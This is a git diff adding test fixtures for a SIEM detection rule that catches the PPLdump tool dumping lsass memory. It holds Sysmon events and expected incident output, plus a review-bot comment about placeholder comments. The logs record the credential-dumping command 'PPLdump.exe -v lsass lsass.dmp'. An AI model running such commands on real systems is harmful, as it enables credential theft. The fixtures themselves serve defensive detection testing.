"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:25.4177398Z\"},\"EventRecordID\":\"564590\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:25.417\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-f415-6081-0000-001040fe4900}\"},{\"Name\":\"SourceProcessId\",\"text\":\"6316\"},{\"Name\":\"SourceThreadId\",\"text\":\"2544\"},{\"Name\":\"SourceImage\",\"text\":\"c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-6e19-6082-0000-001070650000}\"},{\"Name\":\"TargetProcessId\",\"text\":\"652\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1000\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+9fc24|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+2126e|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+211e|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+12c7|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+35c6|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+45f8|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+17974|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+6a271\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "2544", "datafield9": 
"C:\\Windows\\SYSTEM32\\ntdll.dll+9fc24|C:\\Windows\\System32\\KERNELBASE.dll+2126e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+211e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+12c7|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+35c6|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+45f8|C:\\Windows\\System32\\KERNEL32.DLL+17974|C:\\Windows\\SYSTEM32\\ntdll.dll+6a271", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "747f3d96-6e19-6082-0000-001070650000", "object.process.id": "652", "object.process.name": "lsass.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1000", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T18:02:46.497Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "subject.process.guid": "747f3d96-f415-6081-0000-001040fe4900", "subject.process.id": "6316", "subject.process.name": "ppldump.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:25.417Z", "type": "raw", "uuid": "a44245de-9ba9-4bae-a27e-061f6c172bff"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "PPL_Bypass_via_PPLDump_Tool", "correlation_type": "incident", "datafield5": "2544", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+9fc24|C:\\Windows\\System32\\KERNELBASE.dll+2126e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+211e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+12c7|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+35c6|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+45f8|C:\\Windows\\System32\\KERNEL32.DLL+17974|C:\\Windows\\SYSTEM32\\ntdll.dll+6a271", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "PPL_Bypass_via_PPLDump_Tool|msedgewin10|PPLdump.exe -v lsass lsass.dmp", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.session_id": "773690", "object.process.cmdline": "PPLdump.exe -v lsass lsass.dmp", "object.process.cwd": "c:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "747f3d96-6e19-6082-0000-001070650000", "object.process.hash.md5": "DBCA6A3860A106333FF6BE6306B2B186", "object.process.hash.sha1": "F1C0C54AA13037F46F55B721F7E2A2349A30DBCF", "object.process.hash.sha256": "68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41", "object.process.id": "652", "object.process.meta": "Description:? | Product:? 
| Company:?", "object.process.name": "lsass.exe", "object.process.original_name": "?", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "747f3d96-f040-6081-0000-001046ac1b00", "object.process.parent.id": "4864", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "?", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "773690", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "subject.process.guid": "747f3d96-f415-6081-0000-001040fe4900", "subject.process.id": "6316", "subject.process.name": "ppldump.exe"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_2.sc new file mode 100644 index 00000000..ff1acc2f --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_2.sc 
@@ -0,0 +1,6 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:25.3896334Z\"},\"EventRecordID\":\"564589\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:25.377\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-f415-6081-0000-001040fe4900}\"},{\"Name\":\"ProcessId\",\"text\":\"6316\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe\"},{\"Name\":\"FileVersion\",\"text\":\"?\"},{\"Name\":\"Description\",\"text\":\"?\"},{\"Name\":\"Product\",\"text\":\"?\"},{\"Name\":\"Company\",\"text\":\"?\"},{\"Name\":\"OriginalFileName\",\"text\":\"?\"},{\"Name\":\"CommandLine\",\"text\":\"PPLdump.exe -v lsass 
lsass.dmp\"},{\"Name\":\"CurrentDirectory\",\"text\":\"c:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-efc5-6081-0000-00203ace0b00}\"},{\"Name\":\"LogonId\",\"text\":\"0xbce3a\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=F1C0C54AA13037F46F55B721F7E2A2349A30DBCF,MD5=DBCA6A3860A106333FF6BE6306B2B186,SHA256=68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41,IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-f040-6081-0000-001046ac1b00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4864\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-efc5-6081-0000-00203ace0b00", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "773690", "object.process.cmdline": "PPLdump.exe -v lsass lsass.dmp", "object.process.cwd": "c:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": 
"c:\\users\\ieuser\\desktop\\ppldump.exe", "object.process.guid": "747f3d96-f415-6081-0000-001040fe4900", "object.process.hash.imphash": "C547F2E66061A8DFFB6F5A3FF63C0A74", "object.process.hash.md5": "DBCA6A3860A106333FF6BE6306B2B186", "object.process.hash.sha1": "F1C0C54AA13037F46F55B721F7E2A2349A30DBCF", "object.process.hash.sha256": "68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41", "object.process.id": "6316", "object.process.meta": "Description:? | Product:? | Company:?", "object.process.name": "ppldump.exe", "object.process.original_name": "?", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "747f3d96-f040-6081-0000-001046ac1b00", "object.process.parent.id": "4864", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\users\\ieuser\\desktop\\", "object.process.version": "?", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T18:58:15.650Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "773690", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:25.377Z", "type": "raw", "uuid": "f8ef7fd0-08e8-4da7-9ae8-45057b6ed546"} +{"action": "access", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:25.4177398Z\"},\"EventRecordID\":\"564590\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:25.417\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-f415-6081-0000-001040fe4900}\"},{\"Name\":\"SourceProcessId\",\"text\":\"6316\"},{\"Name\":\"SourceThreadId\",\"text\":\"2544\"},{\"Name\":\"SourceImage\",\"text\":\"c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-6e19-6082-0000-001070650000}\"},{\"Name\":\"TargetProcessId\",\"text\":\"652\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1000\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+9fc24|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+2126e|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+211e|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+12c7|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+35c6|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+45f8|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+17974|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+6a271\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "2544", "datafield9": 
"C:\\Windows\\SYSTEM32\\ntdll.dll+9fc24|C:\\Windows\\System32\\KERNELBASE.dll+2126e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+211e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+12c7|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+35c6|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+45f8|C:\\Windows\\System32\\KERNEL32.DLL+17974|C:\\Windows\\SYSTEM32\\ntdll.dll+6a271", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "747f3d96-6e19-6082-0000-001070650000", "object.process.id": "652", "object.process.name": "lsass.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1000", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T18:58:15.650Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "subject.process.guid": "747f3d96-f415-6081-0000-001040fe4900", "subject.process.id": "6316", "subject.process.name": "ppldump.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:25.417Z", "type": "raw", "uuid": "e484f128-19a2-44f8-955e-336a4ec0c447"} +{"action": "access", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:25.4180671Z\"},\"EventRecordID\":\"564591\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:25.417\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-f415-6081-0000-001040fe4900}\"},{\"Name\":\"SourceProcessId\",\"text\":\"6316\"},{\"Name\":\"SourceThreadId\",\"text\":\"2544\"},{\"Name\":\"SourceImage\",\"text\":\"c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-6e19-6082-0000-001070650000}\"},{\"Name\":\"TargetProcessId\",\"text\":\"652\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1000\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+9fc24|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+2126e|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+21a9|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+12c7|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+35c6|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+45f8|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+17974|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+6a271\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "2544", "datafield9": 
"C:\\Windows\\SYSTEM32\\ntdll.dll+9fc24|C:\\Windows\\System32\\KERNELBASE.dll+2126e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+21a9|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+12c7|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+35c6|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+45f8|C:\\Windows\\System32\\KERNEL32.DLL+17974|C:\\Windows\\SYSTEM32\\ntdll.dll+6a271", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "747f3d96-6e19-6082-0000-001070650000", "object.process.id": "652", "object.process.name": "lsass.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1000", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T18:58:15.650Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "subject.process.guid": "747f3d96-f415-6081-0000-001040fe4900", "subject.process.id": "6316", "subject.process.name": "ppldump.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:25.417Z", "type": "raw", "uuid": "5299519a-d1bc-4a02-9757-bb9a63dfcdf3"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "PPL_Bypass_via_PPLDump_Tool", "correlation_type": "incident", "datafield5": "2544", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+9fc24|C:\\Windows\\System32\\KERNELBASE.dll+2126e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+211e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+12c7|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+35c6|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+45f8|C:\\Windows\\System32\\KERNEL32.DLL+17974|C:\\Windows\\SYSTEM32\\ntdll.dll+6a271", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "PPL_Bypass_via_PPLDump_Tool|msedgewin10|PPLdump.exe -v lsass lsass.dmp", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.session_id": "773690", "object.process.cmdline": "PPLdump.exe -v lsass lsass.dmp", "object.process.cwd": "c:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "747f3d96-6e19-6082-0000-001070650000", "object.process.hash.md5": "DBCA6A3860A106333FF6BE6306B2B186", "object.process.hash.sha1": "F1C0C54AA13037F46F55B721F7E2A2349A30DBCF", "object.process.hash.sha256": "68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41", "object.process.id": "652", "object.process.meta": "Description:? | Product:? 
| Company:?", "object.process.name": "lsass.exe", "object.process.original_name": "?", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "747f3d96-f040-6081-0000-001046ac1b00", "object.process.parent.id": "4864", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "?", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "773690", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "subject.process.guid": "747f3d96-f415-6081-0000-001040fe4900", "subject.process.id": "6316", "subject.process.name": "ppldump.exe"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_3.sc new file mode 100644 index 00000000..a5fc3309 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_3.sc 
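Review bot: The comment line before `expect 1` is still the scaffold placeholder (`# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь`, i.e. "your test goes here"), so the fixture never states what scenario it covers; the same placeholder is left in test_3.sc below and in the tail of test_1.sc visible above. Replace it with a one-line description of the scenario and the expected outcome, e.g. `# PPLdump.exe started with "-v lsass lsass.dmp", then opens lsass.exe twice (GrantedAccess 0x1000, EventRecordID 564590/564591) in the same second; exactly one incident is expected, attributed to the first access (CallTrace ...PPLdump.exe+211e)`. The second access event differs from the first only in its CallTrace offset and record id and appears to be there to prove the rule fires once rather than per access; saying so in the comment keeps a later edit from "simplifying" the fixture by dropping it and silently losing that check.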
@@ -0,0 +1,6 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:26.0813373Z\"},\"EventRecordID\":\"564593\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:26.016\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-f416-6081-0000-001033034a00}\"},{\"Name\":\"ProcessId\",\"text\":\"7188\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1075 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Services and Controller app\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"services.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe 652 \\\"lsass.dmp\\\" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v\"},{\"Name\":\"CurrentDirectory\",\"text\":\"c:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-6e19-6082-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=617A0A0BAAB180541DB739C4A6851D784943C317,MD5=DB896369FB58241ADF28515E3765C514,SHA256=A2E369DF26C88015FE1F97C7542D6023B5B1E4830C25F94819507EE5BCB1DFCC,IMPHASH=7D2820FC8CAF521DC2058168B480D204\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-f415-6081-0000-001040fe4900}\"},{\"Name\":\"ParentProcessId\",\"text\":\"6316\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"PPLdump.exe -v lsass lsass.dmp\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-6e19-6082-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\services.exe 652 \"lsass.dmp\" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v", "object.process.cwd": "c:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\services.exe", "object.process.guid": "747f3d96-f416-6081-0000-001033034a00", 
"object.process.hash.imphash": "7D2820FC8CAF521DC2058168B480D204", "object.process.hash.md5": "DB896369FB58241ADF28515E3765C514", "object.process.hash.sha1": "617A0A0BAAB180541DB739C4A6851D784943C317", "object.process.hash.sha256": "A2E369DF26C88015FE1F97C7542D6023B5B1E4830C25F94819507EE5BCB1DFCC", "object.process.id": "7188", "object.process.meta": "Description:Services and Controller app | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "services.exe", "object.process.original_name": "services.exe", "object.process.parent.cmdline": "PPLdump.exe -v lsass lsass.dmp", "object.process.parent.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "object.process.parent.guid": "747f3d96-f415-6081-0000-001040fe4900", "object.process.parent.id": "6316", "object.process.parent.name": "ppldump.exe", 